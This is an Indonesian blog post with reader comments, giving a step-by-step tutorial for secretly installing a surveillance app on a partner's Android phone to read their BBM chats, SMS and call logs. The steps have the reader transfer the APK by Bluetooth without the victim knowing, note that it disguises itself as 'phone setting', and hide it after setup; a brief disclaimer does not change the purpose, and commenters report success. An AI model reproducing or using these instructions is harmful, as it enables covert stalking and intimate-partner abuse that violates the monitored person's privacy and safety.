Cara Sadap Menyadap Bbm Dan Pesan Pacar Di Android

Share:
Dalam kesempatan kali ini saya admin viavo.xyz akan membagikan cara bagaimana menyadap BBM, SMS dan telpon orang lain, dan yang pasti tentunya kita juga penasarankan apa yang dilakukan pacar kita jika tidak bersama kita.Bagaimana kelakuannya,karena mungkin bagi saya sosial media itu bisa di gunakan untuk melancarkan jalannya perselingkuhan,seperti SMSnya,BBMnya,Telponnya dengan siapa.Tak usah khawatir,sebentar lagi anda akan mengetahuinya dengan cara menyadap ponsel milik pacar anda.

viavo.xyz

Catatan :
"Harap diingat" Cara ini bukan untuk kejahatan,Jika anda melakukan untuk kejahatan admin viavo.xyz  tidak bertanggung jawab atas apa yang akan terjadi jadi disarankan gunakan sebaik-baiknya terimakasih.


viavo.xyz

Kita lanjut ke pokok pembahasan baca sampai bawah dengan seksama agar tutorial lancar dan sukses, ok kita langsung saja ke tutorialnya:
1. Siapkan Smartphone pastinya
2. Bahan yang anda perlukan download dulu Danzrha_App.apk.
"danzrha" tanpa petik.
3. Jika anda mengalami kesulitan membuka file silahkan download ES File Explorer Terbaru.
4. Selanjutnya anda kirimkan aplikasi  Danzrha_App.apk ke smartphone korban yang ingin anda sadap bisa lewat bluetooth,ingat jangan sampai ketahuan oleh sang korban untuk melancarkan proses penyadapan.
5. Install aplikasi Danzrha_App.apk dismartphone yang ingin anda sadap,jika sudah terpasang aplikasi akan otomatis bernama phone setting biar tidak mencurigakan.
6. Jalankan aplikasi lalu isi username, password dan emailnya, isi emailnya dengan email karangan saja yang tidak terdaftar di gmail contoh : karangansaja@gmail.com.

7. Jika sudah terisi semua klik "active notification backup" dan pilih Ok.

8. Selanjutnya centang "notificaton service" dan pilih Ok.

9. Jika sudah kembali ke menu sebelumnya lalu pilih "save and hide this app" lalu pilih Ok.

Jika proses creating account berhasil akan muncul pemberitauan dan aplikasi phone setting pun akan otomatis menghilang,dan proses penyadapan berhasil selanjutnya kita bisa cek file BBM, SMS dan Telpon dengan smartphone kita.
Selamat mencoba,semoga bisa mengatasi rasa kecurigaan anda terhadap pasangan anda tentunya,jika anda masih kebingungan dengan tutorial tadi,saya sediakan juga videonya.




CARA SADAP MENYADAP BBM DAN PESAN PACAR DI ANDROID OF YOUTUBE

Baca artikel ini juga : Cara merekam layar android sendiri

8 comments:

  1. Mantap tutorialnya gan
    Mksih sudah saya coba akhirnya berhasil

    ReplyDelete
  2. sama sama gan,,,
    mksh udah mampir

    ReplyDelete
  3. Replies
    1. itu gan link nya di nomer 2 langsung klik aja

      Delete
    2. Mbak aku download belakangnyaada tulisan .eslock, kalau di instal tdk bisa, gmna solusinya? File tidak dapat di buka gitu keterangannya

      Delete
    3. Mbak aku download belakangnyaada tulisan .eslock, kalau di instal tdk bisa, gmna solusinya? File tidak dapat di buka gitu keterangannya

      Delete
  4. coba baca nmer 3 gan, kalau susah nge buka download ES File Explorer ,,makasih udah mampir

    ReplyDelete